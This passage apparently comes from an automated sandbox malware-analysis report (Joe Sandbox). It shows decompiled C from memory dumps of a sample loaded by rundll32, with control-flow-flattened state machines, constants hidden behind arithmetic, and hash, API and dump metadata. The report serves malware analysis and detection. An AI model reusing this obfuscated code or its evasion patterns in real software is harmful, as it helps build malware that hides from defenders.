                                                                                                                    							_t147 = E00338F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
                                                                                                                    							_t168 = _t147;
                                                                                                                    							_t171 =  &(_t171[0xa]);
                                                                                                                    							if(_t147 != 0xffffffff) {
                                                                                                                    								_t154 = 0x4af2a99;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							if(_t154 == 0x4af2a99) {
                                                                                                                    								_t150 = E003319B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
                                                                                                                    								_t171 =  &(_t171[8]);
                                                                                                                    								_t165 = _t150;
                                                                                                                    								_t154 = 0xe5b5021;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t154 != 0xe5b5021) {
                                                                                                                    									goto L11;
                                                                                                                    								} else {
                                                                                                                    									E00341E67(_v4, _v60, _v8, _v48, _t168);
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L6:
                                                                                                                    						return _t165;
                                                                                                                    					}
                                                                                                                    					_t154 = 0x458d12f;
                                                                                                                    					L11:
                                                                                                                    				} while (_t154 != 0xd2f352d);
                                                                                                                    				goto L6;
                                                                                                                    			}

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: -5/$WzSq$^VF$JF
                                                                                                                    • API String ID: 0-2399144359
                                                                                                                    • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                    • Instruction ID: adf0cee9ffc205c19b44d1f8601b04c7bc0745c45448eca7535d7801cb75c2c5
                                                                                                                    • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                    • Instruction Fuzzy Hash: BD7131710083419FC759CF65C98681BBBF2FBC8758F505A1DF296A6260C3B1DA488F83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00349BCF() {
                                                                                                                    				char _v520;
                                                                                                                    				signed int _v524;
                                                                                                                    				signed int _v528;
                                                                                                                    				signed int _v532;
                                                                                                                    				signed int _v536;
                                                                                                                    				unsigned int _v540;
                                                                                                                    				signed int _v544;
                                                                                                                    				signed int _v548;
                                                                                                                    				signed int _v552;
                                                                                                                    				signed int _v556;
                                                                                                                    				signed int _v560;
                                                                                                                    				signed int _v564;
                                                                                                                    				signed int _v568;
                                                                                                                    				signed int _t111;
                                                                                                                    				signed int _t115;
                                                                                                                    				signed int _t117;
                                                                                                                    				void* _t118;
                                                                                                                    				signed int _t132;
                                                                                                                    				void* _t134;
                                                                                                                    				signed int _t135;
                                                                                                                    				signed int* _t136;
                                                                                                                    
                                                                                                                    				_t136 =  &_v568;
                                                                                                                    				_v560 = 0x297e3c;
                                                                                                                    				_v560 = _v560 >> 9;
                                                                                                                    				_t118 = 0x4ead2fe;
                                                                                                                    				_v560 = _v560 + 0xe8be;
                                                                                                                    				_v560 = _v560 ^ 0xc9c09221;
                                                                                                                    				_v560 = _v560 ^ 0xc9c20db8;
                                                                                                                    				_v540 = 0x190e1d;
                                                                                                                    				_v540 = _v540 >> 7;
                                                                                                                    				_v540 = _v540 >> 0xd;
                                                                                                                    				_v540 = _v540 ^ 0x000cdd3b;
                                                                                                                    				_v544 = 0x86c2f0;
                                                                                                                    				_v544 = _v544 | 0x0d7eac20;
                                                                                                                    				_v544 = _v544 ^ 0xe6b61282;
                                                                                                                    				_v544 = _v544 ^ 0xeb41e563;
                                                                                                                    				_v552 = 0x262f60;
                                                                                                                    				_v552 = _v552 ^ 0x76c91adc;
                                                                                                                    				_v552 = _v552 + 0xd1c5;
                                                                                                                    				_v552 = _v552 ^ 0x76fc323e;
                                                                                                                    				_v524 = 0xf427e0;
                                                                                                                    				_v524 = _v524 + 0xffff22a3;
                                                                                                                    				_v524 = _v524 ^ 0x00f85f52;
                                                                                                                    				_v548 = 0xdbc1a5;
                                                                                                                    				_v548 = _v548 >> 0xb;
                                                                                                                    				_v548 = _v548 + 0xf615;
                                                                                                                    				_v548 = _v548 ^ 0x0006ff3e;
                                                                                                                    				_v556 = 0xd2f840;
                                                                                                                    				_v556 = _v556 * 0x5f;
                                                                                                                    				_t134 = 0;
                                                                                                                    				_v556 = _v556 ^ 0x4e4cccaa;
                                                                                                                    				_v568 = 0x74ecfa;
                                                                                                                    				_t132 = 0x53;
                                                                                                                    				_t133 = _v556;
                                                                                                                    				_v568 = _v568 / _t132;
                                                                                                                    				_v568 = _v568 ^ 0xc72664ff;
                                                                                                                    				_v568 = _v568 << 0xf;
                                                                                                                    				_v568 = _v568 ^ 0x862d9f40;
                                                                                                                    				_v536 = 0xc0d44a;
                                                                                                                    				_v536 = _v536 + 0x396d;
                                                                                                                    				_t135 = _v556;
                                                                                                                    				_t117 = _v556;
                                                                                                                    				_v536 = _v536 * 0x46;
                                                                                                                    				_v536 = _v536 ^ 0x34c6c601;
                                                                                                                    				_v532 = 0xf37e83;
                                                                                                                    				_v532 = _v532 << 8;
                                                                                                                    				_v532 = _v532 | 0x760e0a19;
                                                                                                                    				_v532 = _v532 ^ 0xf77c332a;
                                                                                                                    				_v528 = 0x91f8e3;
                                                                                                                    				_v528 = _v528 ^ 0xc904aca2;
                                                                                                                    				_v528 = _v528 ^ 0xc9900919;
                                                                                                                    				do {
                                                                                                                    					while(_t118 != 0x27fe330) {
                                                                                                                    						if(_t118 == 0x4ead2fe) {
                                                                                                                    							_t118 = 0x96d401d;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t118 == 0x7ac597b) {
                                                                                                                    								_t117 = E0033B6CF( &_v520, _v548, _v556, _v568);
                                                                                                                    								_t118 = 0xa7595e6;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t118 == 0x80b0e4e) {
                                                                                                                    									_t90 =  &_v552; // 0xeb41e563
                                                                                                                    									_t111 = E00339B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
                                                                                                                    									_t136 =  &(_t136[4]);
                                                                                                                    									__eflags = _t111;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										_t118 = 0x7ac597b;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									if(_t118 == 0x96d401d) {
                                                                                                                    										_t115 = E003352C2();
                                                                                                                    										_t133 = _t115;
                                                                                                                    										__eflags = _t115;
                                                                                                                    										if(__eflags != 0) {
                                                                                                                    											_t118 = 0x80b0e4e;
                                                                                                                    											continue;
                                                                                                                    										}
                                                                                                                    									} else {
                                                                                                                    										if(_t118 != 0xa7595e6) {
                                                                                                                    											goto L15;
                                                                                                                    										} else {
                                                                                                                    											_t135 = E00332051(_v532, _t117, _v528);
                                                                                                                    											_t118 = 0x27fe330;
                                                                                                                    											continue;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						goto L16;
                                                                                                                    					}
                                                                                                                    					_v564 = 0x69bdc3;
                                                                                                                    					_v564 = _v564 | 0xfd1bce6c;
                                                                                                                    					_v564 = _v564 ^ 0xf153ffb6;
                                                                                                                    					_v564 = _v564 ^ 0x260f00bb;
                                                                                                                    					__eflags = _t135 - _v564;
                                                                                                                    					_t134 = (_t135 == _v564) ? 1 : _t134;
                                                                                                                    					_t118 = 0x8b668cc;
                                                                                                                    					L15:
                                                                                                                    					__eflags = _t118 - 0x8b668cc;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				L16:
                                                                                                                    				return _t134;
                                                                                                                    			}

























                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: <~)$`/&$cA$m9
                                                                                                                    • API String ID: 0-2671356241
                                                                                                                    • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                    • Instruction ID: 1bcebcd9a6c1b6e2f6bd45703d193dc1756e84c29407758e3ab55e3457a7e2e2
                                                                                                                    • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                    • Instruction Fuzzy Hash: E151637100C3019FC399CE21D49942BBBE1FFD8758F501E1EF5A69A264C7B4DA498F92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                    • GetACP.KERNEL32 ref: 1004377E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4232894706-0
                                                                                                                    • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                    • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                    • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                    • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                    • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                    • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                    • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00340E53(void* __ecx) {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				char _v1560;
                                                                                                                    				char _v2080;
                                                                                                                    				char _v2600;
                                                                                                                    				signed int _v2604;
                                                                                                                    				signed int _v2608;
                                                                                                                    				signed int _v2612;
                                                                                                                    				signed int _v2616;
                                                                                                                    				signed int _v2620;
                                                                                                                    				signed int _v2624;
                                                                                                                    				signed int _v2628;
                                                                                                                    				signed int _v2632;
                                                                                                                    				signed int _v2636;
                                                                                                                    				signed int _v2640;
                                                                                                                    				signed int _v2644;
                                                                                                                    				signed int _v2648;
                                                                                                                    				signed int _v2652;
                                                                                                                    				signed int _v2656;
                                                                                                                    				signed int _v2660;
                                                                                                                    				signed int _v2664;
                                                                                                                    				signed int _v2668;
                                                                                                                    				signed int _v2672;
                                                                                                                    				signed int _v2676;
                                                                                                                    				signed int _v2680;
                                                                                                                    				signed int _v2684;
                                                                                                                    				signed int _v2688;
                                                                                                                    				signed int _v2692;
                                                                                                                    				signed int _v2696;
                                                                                                                    				signed int _v2700;
                                                                                                                    				signed int _v2704;
                                                                                                                    				signed int _v2708;
                                                                                                                    				signed int _v2712;
                                                                                                                    				signed int _v2716;
                                                                                                                    				signed int _v2720;
                                                                                                                    				signed int _v2724;
                                                                                                                    				signed int _v2728;
                                                                                                                    				signed int _v2732;
                                                                                                                    				signed int _v2736;
                                                                                                                    				signed int _v2740;
                                                                                                                    				signed int _v2744;
                                                                                                                    				signed int _v2748;
                                                                                                                    				signed int _v2752;
                                                                                                                    				signed int _v2756;
                                                                                                                    				signed int _v2760;
                                                                                                                    				signed int _v2764;
                                                                                                                    				signed int _v2768;
                                                                                                                    				signed int _v2772;
                                                                                                                    				signed int _t406;
                                                                                                                    				signed int _t426;
                                                                                                                    				signed int _t427;
                                                                                                                    				signed int _t428;
                                                                                                                    				signed int _t429;
                                                                                                                    				signed int _t430;
                                                                                                                    				signed int _t435;
                                                                                                                    				void* _t467;
                                                                                                                    				void* _t468;
                                                                                                                    				signed int* _t472;
                                                                                                                    
                                                                                                                    				_t472 =  &_v2772;
                                                                                                                    				_v2700 = 0xd36ba7;
                                                                                                                    				_v2700 = _v2700 << 7;
                                                                                                                    				_v2700 = _v2700 ^ 0xaed70c65;
                                                                                                                    				_v2700 = _v2700 ^ 0xc762dfcc;
                                                                                                                    				_v2652 = 0x6f4609;
                                                                                                                    				_t9 =  &_v2652; // 0x6f4609
                                                                                                                    				_v2652 =  *_t9 * 0x1c;
                                                                                                                    				_t467 = __ecx;
                                                                                                                    				_v2652 = _v2652 ^ 0x0c23569d;
                                                                                                                    				_t468 = 0xea1969c;
                                                                                                                    				_v2608 = 0xb8394b;
                                                                                                                    				_v2608 = _v2608 + 0xaeb5;
                                                                                                                    				_v2608 = _v2608 ^ 0x00b390c3;
                                                                                                                    				_v2736 = 0x3d33f1;
                                                                                                                    				_v2736 = _v2736 + 0xffffd537;
                                                                                                                    				_v2736 = _v2736 + 0xffffb6ee;
                                                                                                                    				_v2736 = _v2736 + 0xbad8;
                                                                                                                    				_v2736 = _v2736 ^ 0x003e0409;
                                                                                                                    				_v2768 = 0xd1d4ce;
                                                                                                                    				_v2768 = _v2768 >> 0xc;
                                                                                                                    				_v2768 = _v2768 ^ 0xb5c37fe4;
                                                                                                                    				_v2768 = _v2768 + 0x4eb3;
                                                                                                                    				_v2768 = _v2768 ^ 0xb5c2c9c4;
                                                                                                                    				_v2760 = 0x157bbd;
                                                                                                                    				_v2760 = _v2760 ^ 0x6d7617e7;
                                                                                                                    				_v2760 = _v2760 ^ 0x1b56cd2f;
                                                                                                                    				_v2760 = _v2760 ^ 0xfb63426d;
                                                                                                                    				_v2760 = _v2760 ^ 0x8d577604;
                                                                                                                    				_v2604 = 0x1fac8b;
                                                                                                                    				_v2604 = _v2604 + 0x9962;
                                                                                                                    				_v2604 = _v2604 ^ 0x0029d956;
                                                                                                                    				_v2696 = 0x3d46b4;
                                                                                                                    				_v2696 = _v2696 | 0x3d7fd3ff;
                                                                                                                    				_v2696 = _v2696 ^ 0x3d7bd02d;
                                                                                                                    				_v2720 = 0xad1695;
                                                                                                                    				_t426 = 9;
                                                                                                                    				_v2720 = _v2720 * 0x4b;
                                                                                                                    				_v2720 = _v2720 >> 0x10;
                                                                                                                    				_v2720 = _v2720 << 0xe;
                                                                                                                    				_v2720 = _v2720 ^ 0x0cab1f79;
                                                                                                                    				_v2644 = 0xe14118;
                                                                                                                    				_v2644 = _v2644 ^ 0x82369820;
                                                                                                                    				_v2644 = _v2644 ^ 0x82de8a4e;
                                                                                                                    				_v2668 = 0x391c30;
                                                                                                                    				_v2668 = _v2668 >> 7;
                                                                                                                    				_v2668 = _v2668 + 0xffff3589;
                                                                                                                    				_v2668 = _v2668 ^ 0xfff6d862;
                                                                                                                    				_v2692 = 0x9dbc3;
                                                                                                                    				_v2692 = _v2692 << 8;
                                                                                                                    				_v2692 = _v2692 * 0x75;
                                                                                                                    				_v2692 = _v2692 ^ 0x81749ad9;
                                                                                                                    				_v2660 = 0x144a46;
                                                                                                                    				_v2660 = _v2660 >> 0xd;
                                                                                                                    				_v2660 = _v2660 ^ 0x0008b8c7;
                                                                                                                    				_v2752 = 0x703c03;
                                                                                                                    				_v2752 = _v2752 * 0x74;
                                                                                                                    				_v2752 = _v2752 ^ 0x2e54cb21;
                                                                                                                    				_v2752 = _v2752 | 0x6f17e683;
                                                                                                                    				_v2752 = _v2752 ^ 0x7f96e2f0;
                                                                                                                    				_v2676 = 0xa438e5;
                                                                                                                    				_v2676 = _v2676 / _t426;
                                                                                                                    				_v2676 = _v2676 + 0x92ff;
                                                                                                                    				_v2676 = _v2676 ^ 0x0015b827;
                                                                                                                    				_v2612 = 0x1c48b9;
                                                                                                                    				_t427 = 0x1a;
                                                                                                                    				_v2612 = _v2612 / _t427;
                                                                                                                    				_v2612 = _v2612 ^ 0x000154fb;
                                                                                                                    				_v2628 = 0x490198;
                                                                                                                    				_v2628 = _v2628 | 0x561f6486;
                                                                                                                    				_v2628 = _v2628 ^ 0x565ec1b9;
                                                                                                                    				_v2616 = 0xcec4ed;
                                                                                                                    				_t428 = 0x3d;
                                                                                                                    				_v2616 = _v2616 * 9;
                                                                                                                    				_v2616 = _v2616 ^ 0x074f393e;
                                                                                                                    				_v2636 = 0x4be85b;
                                                                                                                    				_v2636 = _v2636 >> 1;
                                                                                                                    				_v2636 = _v2636 ^ 0x002afd34;
                                                                                                                    				_v2728 = 0xca47ed;
                                                                                                                    				_v2728 = _v2728 << 1;
                                                                                                                    				_v2728 = _v2728 / _t428;
                                                                                                                    				_v2728 = _v2728 >> 3;
                                                                                                                    				_v2728 = _v2728 ^ 0x00084593;
                                                                                                                    				_v2620 = 0x793301;
                                                                                                                    				_v2620 = _v2620 | 0xccc0d5da;
                                                                                                                    				_v2620 = _v2620 ^ 0xccf56683;
                                                                                                                    				_v2684 = 0xd6c9e7;
                                                                                                                    				_v2684 = _v2684 >> 8;
                                                                                                                    				_v2684 = _v2684 + 0x30fc;
                                                                                                                    				_v2684 = _v2684 ^ 0x000dbf27;
                                                                                                                    				_v2656 = 0x6cf887;
                                                                                                                    				_v2656 = _v2656 | 0x54469415;
                                                                                                                    				_v2656 = _v2656 ^ 0x5469dd96;
                                                                                                                    				_v2712 = 0x1ba43e;
                                                                                                                    				_v2712 = _v2712 + 0xffff54b6;
                                                                                                                    				_v2712 = _v2712 >> 0x10;
                                                                                                                    				_v2712 = _v2712 ^ 0x536d0b9d;
                                                                                                                    				_v2712 = _v2712 ^ 0x5368fd88;
                                                                                                                    				_v2744 = 0x7fa81e;
                                                                                                                    				_v2744 = _v2744 + 0x45dd;
                                                                                                                    				_v2744 = _v2744 | 0xcc5c3b14;
                                                                                                                    				_t429 = 0x76;
                                                                                                                    				_v2744 = _v2744 * 0x48;
                                                                                                                    				_v2744 = _v2744 ^ 0x83f6fb81;
                                                                                                                    				_v2704 = 0x73cce1;
                                                                                                                    				_v2704 = _v2704 >> 6;
                                                                                                                    				_v2704 = _v2704 | 0x0e0742c3;
                                                                                                                    				_v2704 = _v2704 ^ 0x0e0521c8;
                                                                                                                    				_v2764 = 0x3737a7;
                                                                                                                    				_v2764 = _v2764 >> 0xb;
                                                                                                                    				_v2764 = _v2764 << 3;
                                                                                                                    				_v2764 = _v2764 + 0x14ac;
                                                                                                                    				_v2764 = _v2764 ^ 0x0004654a;
                                                                                                                    				_v2772 = 0xaeb57f;
                                                                                                                    				_v2772 = _v2772 / _t429;
                                                                                                                    				_v2772 = _v2772 << 0xf;
                                                                                                                    				_t430 = 0x37;
                                                                                                                    				_v2772 = _v2772 / _t430;
                                                                                                                    				_v2772 = _v2772 ^ 0x037ee988;
                                                                                                                    				_v2648 = 0x954498;
                                                                                                                    				_t431 = 0x4b;
                                                                                                                    				_v2648 = _v2648 / _t431;
                                                                                                                    				_v2648 = _v2648 ^ 0x00054dec;
                                                                                                                    				_v2640 = 0x8be41e;
                                                                                                                    				_v2640 = _v2640 >> 0xd;
                                                                                                                    				_v2640 = _v2640 ^ 0x00089615;
                                                                                                                    				_v2748 = 0xfabe1b;
                                                                                                                    				_v2748 = _v2748 ^ 0xff42a680;
                                                                                                                    				_v2748 = _v2748 + 0xffff8ee7;
                                                                                                                    				_v2748 = _v2748 + 0x1c5a;
                                                                                                                    				_v2748 = _v2748 ^ 0xffbaa703;
                                                                                                                    				_v2756 = 0x33a01d;
                                                                                                                    				_v2756 = _v2756 * 0x6f;
                                                                                                                    				_v2756 = _v2756 << 4;
                                                                                                                    				_v2756 = _v2756 >> 4;
                                                                                                                    				_v2756 = _v2756 ^ 0x066d94da;
                                                                                                                    				_v2672 = 0x7cb69f;
                                                                                                                    				_v2672 = _v2672 << 4;
                                                                                                                    				_v2672 = _v2672 * 0x4a;
                                                                                                                    				_v2672 = _v2672 ^ 0x40c5c2d0;
                                                                                                                    				_v2680 = 0xc0e1f8;
                                                                                                                    				_v2680 = _v2680 << 1;
                                                                                                                    				_v2680 = _v2680 | 0xa5ca1830;
                                                                                                                    				_v2680 = _v2680 ^ 0xa5ca6401;
                                                                                                                    				_v2732 = 0xd52773;
                                                                                                                    				_v2732 = _v2732 ^ 0x8b84e9f5;
                                                                                                                    				_v2732 = _v2732 + 0xffffa58a;
                                                                                                                    				_v2732 = _v2732 >> 1;
                                                                                                                    				_v2732 = _v2732 ^ 0x45a69f9f;
                                                                                                                    				_v2740 = 0x525c84;
                                                                                                                    				_v2740 = _v2740 * 0x45;
                                                                                                                    				_v2740 = _v2740 << 0xd;
                                                                                                                    				_v2740 = _v2740 + 0xffffe485;
                                                                                                                    				_v2740 = _v2740 ^ 0x5df42895;
                                                                                                                    				_v2688 = 0x8afd1b;
                                                                                                                    				_v2688 = _v2688 >> 0xa;
                                                                                                                    				_v2688 = _v2688 * 0x44;
                                                                                                                    				_v2688 = _v2688 ^ 0x000c822b;
                                                                                                                    				_v2632 = 0xb6ec99;
                                                                                                                    				_v2632 = _v2632 + 0xffff2a9a;
                                                                                                                    				_v2632 = _v2632 ^ 0x00b1db1a;
                                                                                                                    				_v2664 = 0xfa37e2;
                                                                                                                    				_v2664 = _v2664 * 0x4c;
                                                                                                                    				_v2664 = _v2664 + 0x9251;
                                                                                                                    				_v2664 = _v2664 ^ 0x4a4e0c53;
                                                                                                                    				_v2708 = 0xf9311d;
                                                                                                                    				_v2708 = _v2708 >> 2;
                                                                                                                    				_t406 = _v2708 * 0x30;
                                                                                                                    				_v2708 = _t406;
                                                                                                                    				_v2708 = _v2708 + 0xffffde46;
                                                                                                                    				_v2708 = _v2708 ^ 0x0bad021b;
                                                                                                                    				_v2624 = 0x51d14;
                                                                                                                    				_v2624 = _v2624 | 0x271919e8;
                                                                                                                    				_v2624 = _v2624 ^ 0x2716653c;
                                                                                                                    				_v2716 = 0x708eea;
                                                                                                                    				_v2716 = _v2716 + 0xfffff8d8;
                                                                                                                    				_v2716 = _v2716 | 0x4ca3cf3c;
                                                                                                                    				_v2716 = _v2716 ^ 0x396f5f4d;
                                                                                                                    				_v2716 = _v2716 ^ 0x7599e4cd;
                                                                                                                    				_v2724 = 0x3acc77;
                                                                                                                    				_v2724 = _v2724 + 0x56d;
                                                                                                                    				_v2724 = _v2724 + 0xb0bb;
                                                                                                                    				_v2724 = _v2724 + 0xffffce89;
                                                                                                                    				_v2724 = _v2724 ^ 0x003c4612;
                                                                                                                    				while(_t468 != 0x5de06da) {
                                                                                                                    					if(_t468 == 0xea1969c) {
                                                                                                                    						_t468 = 0xfa9128f;
                                                                                                                    						continue;
                                                                                                                    					} else {
                                                                                                                    						_t480 = _t468 - 0xfa9128f;
                                                                                                                    						if(_t468 != 0xfa9128f) {
                                                                                                                    							L8:
                                                                                                                    							__eflags = _t468 - 0xa8e801c;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							E0034DA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
                                                                                                                    							 *((short*)(E0033B6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
                                                                                                                    							E00338969(_v2720,  &_v1560, _t480, _v2644, _v2668);
                                                                                                                    							_push(_v2752);
                                                                                                                    							_push(_v2660);
                                                                                                                    							E003347CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E0034DCF7(_v2692, 0x331308, _t480),  &_v1560, _v2616, _v2636);
                                                                                                                    							E0033A8B0(_v2728, _t419, _v2620);
                                                                                                                    							_t431 = _v2684;
                                                                                                                    							_t406 = E0033EA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
                                                                                                                    							_t472 =  &(_t472[0x17]);
                                                                                                                    							if(_t406 != 0) {
                                                                                                                    								_t468 = 0x5de06da;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					return _t406;
                                                                                                                    				}
                                                                                                                    				_push(_v2648);
                                                                                                                    				_push(_v2700);
                                                                                                                    				_push(_v2772);
                                                                                                                    				_push( &_v1040);
                                                                                                                    				E003446BB(_v2704, _v2764);
                                                                                                                    				_push(_v2756);
                                                                                                                    				_push(_v2748);
                                                                                                                    				E003347CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E0034DCF7(_v2640, 0x3313b8, __eflags),  &_v2080, _v2740, _v2688);
                                                                                                                    				_t435 = _v2632;
                                                                                                                    				E0033A8B0(_t435, _t409, _v2664);
                                                                                                                    				__eflags = 0;
                                                                                                                    				_push(_v2724);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_t435);
                                                                                                                    				_push(0);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_v2716);
                                                                                                                    				_t431 = _v2708;
                                                                                                                    				_push( &_v520);
                                                                                                                    				_t406 = E0033AB87(_v2708, _v2624, 0);
                                                                                                                    				_t472 = _t472 - 0xc + 0x64;
                                                                                                                    				_t468 = 0xa8e801c;
                                                                                                                    				goto L8;
                                                                                                                    			}





























































                                                                                                                    0x0034144a
                                                                                                                    0x00341458
                                                                                                                    0x00341572
                                                                                                                    0x00000000
                                                                                                                    0x0034145e
                                                                                                                    0x0034145e
                                                                                                                    0x00341460
                                                                                                                    0x0034163b
                                                                                                                    0x0034163b
                                                                                                                    0x00341641
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00341466
                                                                                                                    0x00341485
                                                                                                                    0x003414bc
                                                                                                                    0x003414c3
                                                                                                                    0x003414c8
                                                                                                                    0x003414d1
                                                                                                                    0x00341524
                                                                                                                    0x00341536
                                                                                                                    0x00341554
                                                                                                                    0x0034155b
                                                                                                                    0x00341560
                                                                                                                    0x00341565
                                                                                                                    0x0034156b
                                                                                                                    0x00000000
                                                                                                                    0x0034156b
                                                                                                                    0x00341565
                                                                                                                    0x00341460
                                                                                                                    0x00341651
                                                                                                                    0x00341651
                                                                                                                    0x00341579
                                                                                                                    0x00341587
                                                                                                                    0x0034158b
                                                                                                                    0x0034159a
                                                                                                                    0x0034159b
                                                                                                                    0x003415a0
                                                                                                                    0x003415a9
                                                                                                                    0x003415f0
                                                                                                                    0x003415fc
                                                                                                                    0x00341605
                                                                                                                    0x0034160d
                                                                                                                    0x0034160f
                                                                                                                    0x00341613
                                                                                                                    0x00341614
                                                                                                                    0x00341615
                                                                                                                    0x00341616
                                                                                                                    0x00341617
                                                                                                                    0x00341629
                                                                                                                    0x0034162d
                                                                                                                    0x0034162e
                                                                                                                    0x00341633
                                                                                                                    0x00341636
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
